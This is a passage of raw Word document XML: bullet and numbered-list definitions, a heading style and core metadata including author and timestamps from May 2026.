      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="128ABE16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="03B47AF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E0F22A9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="31AAAC74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="94284CC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DDD25F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F47CC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8104DB1C"/>
    <w:lvl w:ilvl="0" w:tplc="812E3586">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DEB2DDF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C2BAE2D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EA22DD44">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0F6C081A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="09D69EF2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2566FD42">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8004B3E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="43A6CA66">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="192112663">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="175763475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E4D"/>
    <w:rsid w:val="000311D5"/>
    <w:rsid w:val="0039261F"/>
    <w:rsid w:val="007505BA"/>
    <w:rsid w:val="00775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AEA58"/>
  <w15:docId w15:val="{8D7E84FC-4AA6-48C9-BFDD-6F103B92A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C0392B"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C0392B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vishal singh rajput</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-24T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>